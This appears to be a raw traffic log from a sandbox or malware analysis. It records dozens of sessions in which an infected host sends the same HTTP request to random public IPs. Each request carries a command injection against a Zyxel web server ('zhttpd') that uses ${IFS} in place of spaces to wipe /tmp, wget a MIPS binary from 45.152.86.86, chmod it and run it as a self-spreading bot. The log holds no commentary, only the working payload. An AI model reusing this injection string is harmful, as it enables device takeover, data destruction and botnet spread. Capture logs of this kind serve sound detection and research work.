                                        Mar 31, 2024 09:20:58.590442896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2990192.168.2.2355990184.246.63.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590493917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2991192.168.2.2355778188.48.19.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590528011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2992192.168.2.23558049.108.41.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590584993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2993192.168.2.234127680.223.10.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590641022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2994192.168.2.2358234113.207.201.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590686083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2995192.168.2.23556862.223.33.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590734005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2996192.168.2.2357848203.85.251.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590780020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2997192.168.2.2359424171.73.94.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590840101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2998192.168.2.2335226201.77.147.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590876102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2999192.168.2.235999036.48.167.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590913057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3000192.168.2.2349570117.1.187.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590975046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3001192.168.2.2335660195.223.169.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591015100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3002192.168.2.235710887.60.79.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591065884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3003192.168.2.2347730172.12.234.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591115952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3004192.168.2.2344382184.234.138.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591176987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3005192.168.2.2348770145.55.6.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591219902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3006192.168.2.23548708.134.176.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591260910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3007192.168.2.2359542132.182.205.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591300011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3008192.168.2.2341068103.12.120.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591329098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3009192.168.2.233429893.71.220.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591361046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3010192.168.2.2353010200.220.70.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591425896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3011192.168.2.233495682.175.13.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591484070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3012192.168.2.2359204191.244.229.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591526031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3013192.168.2.2354632201.144.77.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591598988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3014192.168.2.2340546193.251.113.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591629028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3015192.168.2.2333280191.158.238.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591684103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3016192.168.2.233805666.98.27.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591731071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3017192.168.2.2340102212.27.96.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591779947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3018192.168.2.2346898167.23.83.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591818094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3019192.168.2.233536837.95.254.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591866016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3020192.168.2.234492435.219.193.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591902971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3021192.168.2.2353406147.186.127.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591928005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3022192.168.2.234536457.147.199.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.591967106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3023192.168.2.2333410182.15.137.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592024088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3024192.168.2.234796284.82.62.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592067003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3025192.168.2.234856695.74.57.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592102051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3026192.168.2.2352840220.182.119.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592156887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3027192.168.2.235473413.17.75.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592190981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3028192.168.2.2345830128.108.253.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592236996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3029192.168.2.2350142146.49.118.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592288971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3030192.168.2.2346704182.132.156.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592324018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3031192.168.2.2346014130.174.244.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592366934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3032192.168.2.233541680.232.117.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592434883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3033192.168.2.235657613.246.244.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592468023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3034192.168.2.2333520107.146.45.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592505932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3035192.168.2.234181238.107.135.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592535019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3036192.168.2.2355604222.175.116.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592567921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3037192.168.2.2341302154.157.197.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592633009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3038192.168.2.2353754162.221.226.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592670918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3039192.168.2.2334158182.17.9.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592719078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3040192.168.2.2358382102.226.5.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592757940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3041192.168.2.2344152163.175.194.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592799902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3042192.168.2.235808298.128.159.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592847109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3043192.168.2.233824237.65.111.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592915058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3044192.168.2.2338098105.65.228.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.592964888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3045192.168.2.236064644.33.133.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593019962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3046192.168.2.233563432.40.111.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593051910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3047192.168.2.2351188206.236.180.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593122005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3048192.168.2.234629893.67.76.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593154907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3049192.168.2.2348808119.224.26.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593211889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3050192.168.2.235333881.154.208.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593266010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3051192.168.2.2351886124.52.197.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593307018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3052192.168.2.2351250177.223.212.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593358994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3053192.168.2.2357540140.248.120.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593406916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3054192.168.2.2342598129.229.147.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593458891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3055192.168.2.2345268117.211.132.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593497038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3056192.168.2.234802271.234.138.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593542099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3057192.168.2.235282095.181.58.65443
                                        TimestampBytes transferredDirectionData
